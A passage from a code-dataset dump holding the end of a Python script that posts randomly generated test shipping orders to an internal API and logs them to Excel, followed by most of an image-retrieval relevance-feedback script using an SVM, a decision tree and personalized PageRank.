[order_list,order_fail]\ndef order_random(orderno,total,filename):\n def ramdom_decimal(max, decimal):\n import random\n a = round(random.randint(0, max) + random.random(), decimal)\n return a\n def get_date():\n from datetime import datetime\n now = datetime.now()\n date = now.strftime(\"%Y-%m-%d\")\n print(date)\n return date\n no = [\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",]\n order_list = []\n order_fail = []\n wb = Workbook()\n ws = wb.active\n row = [\"单号\",\"单号类型\",\"袋牌号\",\"到货时间\",\"长(cm)\",\"宽(cm)\",\"高(cm)\",\"重量(kg)\",\"锁定产品\",\"使用客户重量(是/否)\"]\n ws.append(row)\n try:\n for i in range(int(total)):\n on = orderno + str(i+1)\n #random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = ramdom_decimal(10,3)\n data[0][\"Length\"] = ramdom_decimal(10,0)\n data[0][\"Height\"] = ramdom_decimal(10,0)\n data[0][\"PackageVolume\"] = ramdom_decimal(10,0)\n data[0][\"TrackingNumber\"] = random.randint(100000000,900000000)\n orderid = post_basic(u = urls[\"orderurl\"],d= data,authorizaiton=1)\n if orderid[0] != 0:\n order_list.append(orderid[1])\n ws.append([orderid[1], \"\", \"袋子号\", \"\",data[0][\"Length\"] , data[0][\"PackageVolume\"], data[0][\"Height\"], data[0][\"Weight\"], \"\", \"是\"])\n #time.sleep(int(sleep))\n else:\n order_fail.append(orderid[1])\n #time.sleep(int(sleep))\n # wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\"+ filename + \".xlsx\")\n wb.save(\"doc//批量签入签出\" + filename + \".xlsx\")\n except Exception as e:\n try:\n # wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\"+ filename + \".xlsx\")\n print(\"下单失败:\",e)\n wb.save(\"doc//批量签入签出\" + filename + \".xlsx\")\n except Exception as e:\n #wb.save(\"C:\\\\Users\\\\Administrator\\\\Desktop\\\\批量签入签出\" + filename + str(random.choice(no)) + \".xlsx\")\n print(\"保存失败:\",e)\n wb.save(\"doc//批量签入签出\" + filename + str(random.choice(no)) + \".xlsx\")\n return [order_list,order_fail]\ndef order_thread(orderno,i):\n lock.acquire()\n on = orderno + str(i + 1)\n print(on)\n # random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = ramdom_decimal(10, 3)\n data[0][\"Length\"] = ramdom_decimal(10, 0)\n data[0][\"Height\"] = ramdom_decimal(10, 0)\n data[0][\"PackageVolume\"] = ramdom_decimal(10, 0)\n data[0][\"TrackingNumber\"] = random.randint(10000000000, 90000000000)\n orderid = post_basic(u=urls[\"orderurl\"], d=data, authorizaiton=1)\n lock.release()\n return orderid\n\n\nif __name__ == \"__main__\":\n '''start = time.time()\n lock = threading.Lock()\n for i in range(100):\n t = threading.Thread(target=order_thread, args=(\"20190411199999\", i))\n t.start()\n for i in range(100):\n on = \"20190417111111\" + str(i + 1)\n print(on)\n # random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = ramdom_decimal(10, 3)\n data[0][\"Length\"] = ramdom_decimal(10, 0)\n data[0][\"Height\"] = ramdom_decimal(10, 0)\n data[0][\"PackageVolume\"] = ramdom_decimal(10, 0)\n data[0][\"TrackingNumber\"] = random.randint(10000000000, 90000000000)\n result = post_basic(u=urls[\"orderurl\"],d=data,authorizaiton=1)\n print(result)\n end = time.time()-start\n print(end)\n \n url = \"http://10.168.95.149:8022/api/OtsOpenApi\"\n\n redata= post_ots(url+\"/PredictionBatchNo\",data,authorizaiton=1)\n '''\n header_test[\"Authorization\"] = \"Basic {}\".format(get_authorizaiton())\n print(header_test)\n\n","sub_path":"request_order.py","file_name":"request_order.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"65920055","text":"from utils.cli_options import *\nfrom utils.similarity_measures import *\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import TruncatedSVD\nimport os\nimport pickle\nimport pagerank as pagerank\nimport scipy.sparse as sparse\nimport h5py\nimport task5 as lsh\nimport cvxopt\nimport cvxopt.solvers\nfrom cvxopt import matrix as cvxopt_matrix\nfrom cvxopt import solvers as cvxopt_solvers\n\n\nCURRENT_DIR = os.path.dirname(__file__)\nIMG_PREFIX = '/Hand_'\nIMG_EXT = '.jpg'\nOUTPUT_DIR = CURRENT_DIR + os.sep + '..' + os.sep + 'Outputs'\n\n\nclass Node:\n def __init__(self, gini, num_samples, num_samples_per_class, predicted_class):\n self.gini = gini\n self.num_samples = num_samples\n self.num_samples_per_class = num_samples_per_class\n self.predicted_class = predicted_class\n self.feature_index = 0\n self.threshold = 0\n self.left = None\n self.right = None\n\n\nclass DecisionTreeClassifier:\n def __init__(self, max_depth = None):\n self.max_depth = max_depth\n\n def _best_split(self, X, y):\n # Need at least two elements to split a node.\n m = y.size\n if m <= 1:\n return None, None\n\n # Count of each class in the current node.\n num_parent = [np.sum(y == c) for c in range(self.n_classes_)]\n\n # Gini of current node.\n best_gini = 1.0 - sum((n / m) ** 2 for n in num_parent)\n best_idx, best_thr = None, None\n\n # Loop through all features.\n for idx in range(self.n_features_):\n # Sort data along selected feature.\n thresholds, classes = zip(*sorted(zip(X[:, idx], y)))\n\n # We could actually split the node according to each feature/threshold pair\n # and count the resulting population for each class in the children, but\n # instead we compute them in an iterative fashion, making this for loop\n # linear rather than quadratic.\n num_left = [0] * self.n_classes_\n num_right = num_parent.copy()\n for i in range(1, m): # possible split positions\n c = classes[i - 1]\n num_left[c] += 1\n num_right[c] -= 1\n gini_left = 1.0 - sum(\n (num_left[x] / i) ** 2 for x in range(self.n_classes_)\n )\n gini_right = 1.0 - sum(\n (num_right[x] / (m - i)) ** 2 for x in range(self.n_classes_)\n )\n\n # The Gini impurity of a split is the weighted average of the Gini\n # impurity of the children.\n gini = (i * gini_left + (m - i) * gini_right) / m\n\n # The following condition is to make sure we don't try to split two\n # points with identical values for that feature, as it is impossible\n # (both have to end up on the same side of a split).\n if thresholds[i] == thresholds[i - 1]:\n continue\n\n if gini < best_gini:\n best_gini = gini\n best_idx = idx\n best_thr = (thresholds[i] + thresholds[i - 1]) / 2 # midpoint\n\n return best_idx, best_thr\n\n def fit(self, X, y):\n \"\"\"Build decision tree classifier.\"\"\"\n self.n_classes_ = len(set(y)) # classes are assumed to go from 0 to n-1\n self.n_features_ = X.shape[1]\n self.tree_ = self._grow_tree(X, y)\n\n def _grow_tree(self, X, y, depth = 0):\n \"\"\"Build a decision tree by recursively finding the best split.\"\"\"\n # Population for each class in current node. The predicted class is the one with\n # largest population.\n num_samples_per_class = [np.sum(y == i) for i in range(self.n_classes_)]\n predicted_class = np.argmax(num_samples_per_class)\n node = Node(\n gini = self._gini(y),\n num_samples = y.size,\n num_samples_per_class = num_samples_per_class,\n predicted_class = predicted_class,\n )\n\n # Split recursively until maximum depth is reached.\n if depth < self.max_depth:\n idx, thr = self._best_split(X, y)\n if idx is not None:\n indices_left = X[:, idx] < thr\n X_left, y_left = X[indices_left], y[indices_left]\n X_right, y_right = X[~indices_left], y[~indices_left]\n node.feature_index = idx\n node.threshold = thr\n node.left = self._grow_tree(X_left, y_left, depth + 1)\n node.right = self._grow_tree(X_right, y_right, depth + 1)\n return node\n\n def predict(self, X):\n return [self._predict(inputs) for inputs in X]\n\n def _predict(self, inputs):\n \"\"\"Predict class for a single sample.\"\"\"\n node = self.tree_\n while node.left:\n if inputs[node.feature_index] < node.threshold:\n node = node.left\n else:\n node = node.right\n return node.predicted_class\n\n def _gini(self, y):\n m = y.size\n return 1.0 - sum((np.sum(y == c) / m) ** 2 for c in range(self.n_classes_))\n\n\ndef input_rel_irrelevant_image_ids(is_relevant=True, relevant_set=None):\n image_ids = []\n if is_relevant:\n print('Enter relevant image ids as comma separated value:')\n else:\n print('Enter irrelevant image ids as comma separated value:')\n input_str = input()\n input_ids = []\n if input_str.strip() != '':\n input_ids = [x.strip() for x in input_str.split(',')]\n\n if is_relevant:\n if not relevant_set:\n relevant_set = []\n for img_id in input_ids:\n if img_id not in relevant_set:\n image_ids.append(img_id)\n else:\n if not relevant_set:\n relevant_set = []\n\n for img_id in input_ids:\n if img_id in relevant_set:\n relevant_set.remove(img_id)\n image_ids.append(img_id)\n\n return image_ids, relevant_set\n\n # so that we can avoid duplicates\n # if image_id not in image_ids:\n # image_ids.append(image_id)\n #\n # while image_id != '-1':\n # image_id = input()\n # if image_id == '-1':\n # break\n # image_ids.append(image_id)\n #\n # return image_ids\n\n\nclass ImageSimilarity:\n def __init__(self, image_id, similarity):\n self.image_id = image_id\n self.similarity = similarity\n\n\ndef dimension_reduction(X, k, selected_model, dim_reduction_tech, input_images):\n model = get_feature_model(selected_model)\n dim_reduction_model = get_dim_reduction_tech(dim_reduction_tech)\n\n top_dim = 10\n\n # PCA\n if dim_reduction_tech == \"1\":\n pca = PCA(n_components = top_dim)\n U, _, V = pca._fit(X)\n latent_features = U[:, :top_dim]\n\n # SVD\n elif dim_reduction_tech == \"2\":\n # U, _, V = np.linalg.svd(X)\n svd = TruncatedSVD(n_components=top_dim)\n U = svd.fit_transform(np.array(X))\n latent_features = U[:, :top_dim]\n\n # TODO: STORE THE SIMILARITY DICT IN H5py or pickle object beforehand\n # Find the similarity\n similarity_dict = {}\n lf_len = len(latent_features)\n\n for i in range(lf_len):\n for j in range(lf_len):\n if i == j:\n continue\n\n # dist = euclidean_distance(list(latent_features[i]), list(latent_features[j]))\n sim = cosine_similarity(list(latent_features[i]), list(latent_features[j]))\n # sim = round((1 / dist) * 1000, 4)\n # Here we just have the input image ids not the input image object as we don't depend on the data set\n img_sim = ImageSimilarity(input_images[j], sim)\n\n if input_images[i] not in similarity_dict:\n similarity_dict[input_images[i]] = [img_sim]\n else:\n similarity_dict[input_images[i]].append(img_sim)\n\n # Sort the similarity graph (dictionary)\n for key, val in similarity_dict.items():\n similarity_dict[key] = sorted(val, key = lambda x: x.similarity, reverse = True)\n # chose the top k related images\n similarity_dict[key] = similarity_dict[key][:k]\n\n # Normalize the values to sum of 1\n\n return similarity_dict\n\n\ndef ppr(similarity_dict, images, K):\n related_images = []\n weights = []\n personalize = []\n image_id_map = {}\n temp = 0\n for k, v in similarity_dict.items():\n image_id_map[k] = temp\n temp += 1\n\n for k, v in similarity_dict.items():\n found = False\n for j in images:\n if j == k:\n personalize.append(1/(len(images)))\n found = True\n break\n if not found :\n personalize.append(0)\n\n for i in v:\n edge = []\n edge.append(image_id_map[k])\n edge.append(image_id_map[i.image_id])\n related_images.append(edge)\n weights.append(i.similarity)\n # print('\\n')\n\n A = np.array(related_images)\n weights = np.array(weights)\n G = sparse.csr_matrix((weights, (A[:, 0], A[:, 1])), shape=(len(similarity_dict), len(similarity_dict)))\n personalize = np.array(personalize)\n # pr = pagerank.pagerank_power(G, p=0.85, personalize=None, tol=1e-6, max_iter=200)\n pr = pagerank.personalizedPageRank(G, personalize, c=0.20, allowedDiff=1e-9, maxIters=200)\n pr_sorted = np.argsort(pr)\n pr_sorted = pr_sorted[::-1]\n\n img_ppr = []\n # print('\\nPersonalized Page ranking are:\\n-------------------------------------------')\n\n # for t in range(0, K):\n for t in range(len(pr_sorted)):\n id = pr_sorted[t]\n score = pr[id]\n for image_id, node_id in image_id_map.items():\n if node_id == id:\n # no need to print score for the image\n # print('\\n')\n # print('Image ID ' + str(t + 1) + ': ' + image_id + ' : ' + str(score))\n\n # Store the information to display it using matplot\n temp = [image_id, score]\n img_ppr.append(temp)\n return img_ppr\n\n\n# print formatted search results\ndef print_ranked_results(similarity_list, relevant_images=None):\n print('\\nRanked result set from task 5:')\n print('Image ID: Score')\n\n if relevant_images:\n rel_img_id = relevant_images[0]\n lsh_index = lsh.LSHIndex()\n q_img_idx = lsh_index.image_id_map[rel_img_id]\n\n for i in range(len(similarity_list)):\n print(similarity_list[i][0] + ' : ' + str(similarity_list[i][2]))\n # if similarity_list[i][0] == rel_img_id:\n # q_img_idx = i\n\n satisfied = input(\"\\nDo you want to visualize the result set? [Enter 'yes' or 'no']\\n\")\n if satisfied == 'yes':\n\n lsh_index.visualize_similar_results(q_img_idx, len(similarity_list), similarity_list)\n else:\n for i in range(len(similarity_list)):\n print(similarity_list[i][0] + ' : ' + str(similarity_list[i][2]))\n\n print()\n\n# print formatted search results\ndef print_ranked_results_v2(query_image_id, ranked_image_ids, scores, total_images):\n print('\\nRanked result set from task 5:')\n print('Image ID: Score')\n\n lsh_index = lsh.LSHIndex()\n\n counter = 0\n for ranked_image_id, score in zip(ranked_image_ids, scores):\n if counter == total_images:\n break\n print(ranked_image_id + ' : ' + str(score))\n counter += 1\n\n is_visualize = input(\"\\nDo you want to visualize the result set? [Enter 'yes' or 'no']\\n\")\n if is_visualize == 'yes':\n lsh_index.visualize_similar_results_v2(query_image_id, ranked_image_ids, scores, total_images)\n\n print()\n\ndef polynomial_kernel(x1,x2,p =3):\n return (1 + np.dot(x1, x2)) ** p\n\n\ndef rbf_kernel(x1,x2):\n return np.exp(-0.5*np.sum((x1-x2)**2))\n\ndef run_task():\n # selected_model = choose_feature_model()\n selected_model = \"1\"\n # dim_reduction_tech = choose_dim_reduction_tech()\n dim_reduction_tech = \"2\"\n rel_feed_model = choose_relevance_feedback_model()\n\n # read task 5 output - ranked images\n similarity_list = None\n similarity_dict = {}\n T = -1\n ranked_res_pickle = OUTPUT_DIR + os.sep + 'Task_5' + os.sep + 'task5_output.pkl'\n if os.path.exists(ranked_res_pickle):\n with open(ranked_res_pickle, 'rb') as handle:\n similarity_list = pickle.load(handle)\n T = len(similarity_list)\n\n # lsh_similarity_list = list(similarity_list)\n\n # has feature vectors for similar images only\n feature_matrix = []\n # display existing ranked results for the user to pick relevant and irrelevant images\n # console_msg = 'Image ID: Score Image ID: Score Image ID: Score Image ID: Score Image ID: Score ' \\\n # 'Image ID: Score Image ID: Score Image ID: Score'\n\n hdf5_file = CURRENT_DIR + os.sep + '..' + os.sep + 'Metadata' + os.sep + 'feature_vectors_full_data.hdf5'\n data_cm = None\n with h5py.File(hdf5_file, 'r') as hf:\n data_cm = hf['hog_features'][:]\n\n # method call to format and print search results\n # passing first result as relevant set so that it can be used for html visualization\n print_ranked_results(similarity_list, [similarity_list[0][0]])\n\n ranked_image_ids = []\n for i in range(len(similarity_list)):\n # if i % 8 == 0:\n # console_msg += '\\n'\n # else:\n # console_msg += ', '\n # console_msg += similarity_list[i][0] + (\" : %.7f\" % (similarity_list[i][2]))\n\n similarity_dict[similarity_list[i][0]] = similarity_list[i][2]\n\n h5_image_idx = similarity_list[i][1]\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n ranked_image_ids.append(similarity_list[i][0])\n\n # print('Ranked result set from task 5:')\n # print(console_msg + '\\n')\n\n # get user input for relevant and irrelevant images\n # the relevant image set will always have the initial user query image id\n relevant_set = [ranked_image_ids[0]]\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False, relevant_set=relevant_set)\n\n lsh_index = lsh.LSHIndex()\n data_hog_ = lsh_index.data_hog_\n binary_data_hog_ = np.ones(data_hog_.shape) * (data_hog_ > np.mean(data_hog_, axis=0))\n\n # TODO: add SVM relevance feedback system code\n if rel_feed_model == \"1\":\n provide_rel_feedback = 'yes'\n top_irr_to_discard = 5\n t_rel = T\n\n query_image_id = relevant_set[0]\n query_image_features = feature_matrix[0]\n\n while 'yes' in provide_rel_feedback:\n\n #top_results_considered = T // len(relevant_set)\n X = []\n y = []\n # Relevant = 0\n # Irrelevant = 1\n for ranked_image_id, feature_row in zip(ranked_image_ids, feature_matrix):\n if ranked_image_id in relevant_set:\n y.append(1)\n X.append(feature_row)\n elif ranked_image_id in irrelevant_set:\n y.append(-1)\n X.append(feature_row)\n\n X = np.array(X)\n y = np.array(y)\n n = X.shape[0] #len(X)\n K = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n K[i][j] = y[i] * y[j] * polynomial_kernel(X[i], X[j])\n P = cvxopt_matrix(K)\n q = cvxopt_matrix(np.ones(n) * -1)\n A = y.reshape((1, n))\n A = cvxopt_matrix(A.astype('double'))\n C = 5\n # A = matrix(y, (1, n), tc='d')\n b = cvxopt_matrix(0, tc='d')\n temp1 = np.identity(n) * -1\n temp2 = np.identity(n)\n G = cvxopt_matrix(np.vstack((temp1, temp2)))\n temp3 = cvxopt_matrix(np.zeros(n))\n temp4 = cvxopt_matrix(np.ones(n) * C)\n h = cvxopt_matrix(np.vstack((temp3, temp4)))\n cvxopt_solvers.options['show_progress'] = False\n solution = cvxopt_solvers.qp(P, q, G, h, A, b)\n alphas = np.array(solution['x']).reshape(n)\n support_vectors = np.where(alphas > 1e-7)[0][0]\n b = y[support_vectors] - sum(alphas * y * polynomial_kernel(X, X[support_vectors]))\n # Model fit\n \n \n irrelevant_related_images = []\n for i in range(len(irrelevant_set)):\n results_for_this_image = lsh_index.query_image(irrelevant_set[i])\n # print(results_for_this_image, irrelevant_set[i],' are the results')\n if len(results_for_this_image) > top_irr_to_discard:\n results_for_this_image = results_for_this_image[:top_irr_to_discard]\n\n for result in results_for_this_image:\n irrelevant_related_images.append(result[0])\n\n # TODO: make sure to have query image vector as well\n # best we can include all the results from\n # do lsh using irrelevant as well and remove some images from actual image query\n # and remove unwanted from actual result set\n rel_result_sets = {}\n images_included_in_result_set = []\n xyz = 0\n for i in range(len(relevant_set)):\n results_for_this_image = lsh_index.query_image(relevant_set[i])\n result_count_included = 0\n top_results = []\n #for result in results_for_this_image[:top_results_considered]:\n for result in results_for_this_image:\n # if result_count_included > t_rel:\n # break\n\n if result[0] not in images_included_in_result_set:\n top_results.append(result)\n images_included_in_result_set.append(result[0])\n result_count_included += 1\n\n # if len(results_for_this_image) > t_rel:\n # results_for_this_image = results_for_this_image[:t_rel]\n\n # rel_result_sets[relevant_set[i]] = results_for_this_image\n rel_result_sets[relevant_set[i]] = top_results\n xyz += len(top_results)\n\n for rel_id,image_list in rel_result_sets.items():\n temp = []\n for im in image_list:\n if im not in irrelevant_related_images:\n temp.append(im)\n\n rel_result_sets[rel_id] = temp\n\n\n feature_matrix = []\n new_image_ids = []\n for k, v in rel_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irrelevant_set:\n new_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n\n latent_features_unlabelled = feature_matrix\n predict = np.zeros(len(latent_features_unlabelled))\n\n for i in range(len(latent_features_unlabelled)):\n asum = 0\n vector = latent_features_unlabelled[i]\n asum = sum(alphas*y*polynomial_kernel(X,vector)) + b\n predict[i] = np.sign(asum)\n results = predict\n #Prediction done\n\n final_image_ids = []\n final_feature_matrix = []\n\n for new_image_id, feature_vector, prediction in zip(new_image_ids, feature_matrix, results):\n # relevant\n if prediction == 1:\n final_image_ids.append(new_image_id)\n final_feature_matrix.append(feature_vector)\n\n # distance of each new image ID(all relevant) from query image\n final_image_distances = [np.linalg.norm(feature_vector - query_image_features)\n for feature_vector in final_feature_matrix]\n\n # sorting relevant image IDs based on distance from query image\n ranked_image_ids = [x for _, x in sorted(zip(final_image_distances, final_image_ids), key=lambda pair: pair[0])]\n feature_matrix = [x for _, x in sorted(zip(final_image_distances, final_feature_matrix), key=lambda pair: pair[0])]\n final_image_distances.sort()\n\n final_image_scores = []\n for final_image_distance in final_image_distances:\n final_image_scores.append(1 / (1+final_image_distance))\n\n\n print_ranked_results_v2(query_image_id, ranked_image_ids, final_image_scores, t_rel)\n # print('New results based on relevace feedback(renewd query formation):\\nImage ID : Score')\n # for ranked_image_id, final_image_score in zip(ranked_image_ids, final_image_scores):\n # print(f'{ranked_image_id} : {final_image_score}')\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? [Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant = False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n \n #################################### DECISION TREE ####################################\n elif rel_feed_model == \"2\":\n\n provide_rel_feedback = 'yes'\n t_rel = T #len(similarity_list)\n top_irr_to_discard = 5\n\n query_image_id = relevant_set[0]\n query_image_features = feature_matrix[0]\n\n while 'yes' in provide_rel_feedback:\n\n top_results_considered = T // len(relevant_set)\n\n X = []\n y = []\n # Relevant = 0\n # Irrelevant = 1\n for ranked_image_id, feature_row in zip(ranked_image_ids, feature_matrix):\n if ranked_image_id in relevant_set:\n y.append(0)\n X.append(feature_row)\n elif ranked_image_id in irrelevant_set:\n y.append(1)\n X.append(feature_row)\n\n X = np.array(X)\n y = np.array(y)\n\n clf = DecisionTreeClassifier(max_depth = 5)\n clf.fit(X, y)\n\n # NEW LOGIC\n\n irrelevant_related_images = []\n for i in range(len(irrelevant_set)):\n results_for_this_image = lsh_index.query_image(irrelevant_set[i])\n if len(results_for_this_image) > top_irr_to_discard:\n results_for_this_image = results_for_this_image[:top_irr_to_discard]\n\n for result in results_for_this_image:\n irrelevant_related_images.append(result[0])\n\n # # TODO: make sure to have query image vector as well\n # # best we can include all the results from\n # # do lsh using irrelevant as well and remove some images from actual image query\n # # and remove unwanted from actual result set\n # rel_result_sets = {}\n # images_included_in_result_set = []\n # for i in range(len(relevant_set)):\n # results_for_this_image = lsh_index.query_image(relevant_set[i])\n # result_count_included = 0\n # top_results = []\n # for result in results_for_this_image[:top_results_considered]:\n # if result_count_included > t_rel:\n # break\n # if result[0] not in images_included_in_result_set:\n # top_results.append(result)\n # images_included_in_result_set.append(result[0])\n # result_count_included += 1\n #\n # rel_result_sets[relevant_set[i]] = top_results\n\n # TODO: make sure to have query image vector as well\n # best we can include all the results from\n # do lsh using irrelevant as well and remove some images from actual image query\n # and remove unwanted from actual result set\n rel_result_sets = {}\n images_included_in_result_set = []\n xyz = 0\n for i in range(len(relevant_set)):\n results_for_this_image = lsh_index.query_image(relevant_set[i])\n result_count_included = 0\n top_results = []\n # for result in results_for_this_image[:top_results_considered]:\n for result in results_for_this_image:\n # if result_count_included > t_rel:\n # break\n\n if result[0] not in images_included_in_result_set:\n top_results.append(result)\n images_included_in_result_set.append(result[0])\n result_count_included += 1\n\n # if len(results_for_this_image) > t_rel:\n # results_for_this_image = results_for_this_image[:t_rel]\n\n # rel_result_sets[relevant_set[i]] = results_for_this_image\n rel_result_sets[relevant_set[i]] = top_results\n xyz += len(top_results)\n\n for rel_id, image_list in rel_result_sets.items():\n temp = []\n for im in image_list:\n if im not in irrelevant_related_images:\n temp.append(im)\n\n rel_result_sets[rel_id] = temp\n\n feature_matrix = []\n new_image_ids = []\n for k, v in rel_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irrelevant_set:\n new_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n predictions = clf.predict(feature_matrix)\n\n # predicted 'relevant' by decision tree\n final_image_ids = []\n final_feature_matrix = []\n\n for new_image_id, feature_vector, prediction in zip(new_image_ids, feature_matrix, predictions):\n # relevant\n if prediction == 0:\n final_image_ids.append(new_image_id)\n final_feature_matrix.append(feature_vector)\n\n # distance of each new image ID(all relevant) from query image\n final_image_distances = [np.linalg.norm(feature_vector - query_image_features)\n for feature_vector in final_feature_matrix]\n\n # sorting relevant image IDs based on distance from query image\n ranked_image_ids = [x for _, x in sorted(zip(final_image_distances, final_image_ids), key=lambda pair: pair[0])]\n feature_matrix = [x for _, x in sorted(zip(final_image_distances, final_feature_matrix), key=lambda pair: pair[0])]\n final_image_distances.sort()\n\n final_image_scores = []\n for final_image_distance in final_image_distances:\n if final_image_distance != 0:\n final_image_scores.append(1 / final_image_distance)\n else:\n final_image_scores.append(1)\n\n print_ranked_results_v2(query_image_id, ranked_image_ids, final_image_scores, t_rel)\n # print('New results based on relevace feedback(renewd query formation):\\nImage ID : Score')\n # for ranked_image_id, final_image_score in zip(ranked_image_ids[:t_rel], final_image_scores[:t_rel]):\n # print(f'{ranked_image_id} : {final_image_score}')\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? [Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant = False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n # PPR based relevance feedback system\n elif rel_feed_model == \"3\":\n number_of_edges = 10\n number_of_edges_irr = 7\n t_rel = 20\n top_irr_to_discard = 5\n\n provide_rel_feedback = 'yes'\n\n while 'yes' in provide_rel_feedback:\n irrelevant_related_images = []\n irr_result_sets = {}\n for i in range(len(irrelevant_set)):\n results_for_this_image = lsh_index.query_image(irrelevant_set[i])\n if len(results_for_this_image) > top_irr_to_discard:\n results_for_this_image = results_for_this_image[:t_rel]\n\n irr_result_sets[irrelevant_set[i]] = results_for_this_image\n # for result in results_for_this_image:\n # top_results.append(result)\n # irrelevant_related_images.append(result[0])\n irr_feature_matrix = []\n irr_image_ids = []\n for k, v in irr_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irr_image_ids:\n irr_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n irr_feature_matrix.append(feature_vector)\n\n similarity_dict_2 = dimension_reduction(np.array(irr_feature_matrix), number_of_edges_irr, selected_model,\n dim_reduction_tech,\n irr_image_ids)\n irrel_img_ppr = ppr(similarity_dict_2, irrelevant_set, len(irr_feature_matrix))\n # Found after multiple run that we will have around 3 irrelevant images for each irrelevant marked\n # images by the user, so we remove len of user irrelevant set * 3\n irrel_img_ppr = irrel_img_ppr[:(len(irrelevant_set)*3)]\n\n for ir_ppr in irrel_img_ppr:\n irrelevant_related_images.append(ir_ppr[0])\n\n # TODO: make sure to have query image vector as well\n # best we can include all the results from\n # do lsh using irrelevant as well and remove some images from actual image query\n # and remove unwanted from actual result set\n rel_result_sets = {}\n images_included_in_result_set = []\n for i in range(len(relevant_set)):\n results_for_this_image = lsh_index.query_image(relevant_set[i])\n result_count_included = 0\n top_results = []\n for result in results_for_this_image:\n if result_count_included > t_rel:\n break\n\n if result[0] not in images_included_in_result_set:\n top_results.append(result)\n images_included_in_result_set.append(result[0])\n result_count_included += 1\n\n # if len(results_for_this_image) > t_rel:\n # results_for_this_image = results_for_this_image[:t_rel]\n\n # rel_result_sets[relevant_set[i]] = results_for_this_image\n rel_result_sets[relevant_set[i]] = top_results\n\n feature_matrix = []\n new_image_ids = []\n for k, v in rel_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irrelevant_set and img_id not in irrelevant_related_images:\n new_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n similarity_dict_ = dimension_reduction(np.array(feature_matrix), number_of_edges, selected_model, dim_reduction_tech,\n new_image_ids)\n rel_img_ppr = ppr(similarity_dict_, relevant_set, len(feature_matrix))\n ppr_ranked_images = []\n\n for ppr1 in rel_img_ppr:\n ppr_ranked_images.append(ppr1[0])\n\n counter = 0\n user_specified_t = len(similarity_list)\n similarity_list = []\n for ppr1 in rel_img_ppr:\n if counter == user_specified_t:\n break\n if ppr1[0] in ppr_ranked_images:\n img_id = ppr1[0]\n img_score = ppr1[1]\n h5_image_idx = lsh_index.image_id_map[img_id]\n temp = (img_id, h5_image_idx, img_score)\n similarity_list.append(temp)\n counter += 1\n\n # print the new result set obtained after including relevance feedback\n print_ranked_results(similarity_list, relevant_set)\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? [Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant = False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n # TODO: RFeedback with new query formulation\n elif rel_feed_model == \"4\":\n provide_rel_feedback = 'yes'\n\n while 'yes' in provide_rel_feedback:\n relevant_index = [lsh_index.image_id_map[u] for u in relevant_set]\n irrelevant_index = [lsh_index.image_id_map[u] for u in irrelevant_set]\n\n similarity_index = [u for _, u, _ in similarity_list]\n\n p_i_relevant = np.sum(binary_data_hog_[relevant_index], axis=0) / len(relevant_index)\n p_i_irrelevant = np.sum(binary_data_hog_[irrelevant_index], axis=0) / len(irrelevant_index)\n\n ratio = (p_i_relevant + 1e-6) / (p_i_irrelevant + 1e-6)\n\n # term_values1 = p_i*(1-u_i)/(1-p_i)\n # term_values2 = u_i\n term_values_log = np.log(ratio)\n term_values_log = term_values_log.reshape((-1, 1))\n ranked_list_matrix = binary_data_hog_[similarity_index]\n\n new_similarity_score_list = np.dot(ranked_list_matrix, term_values_log)\n new_similarity_score_list = 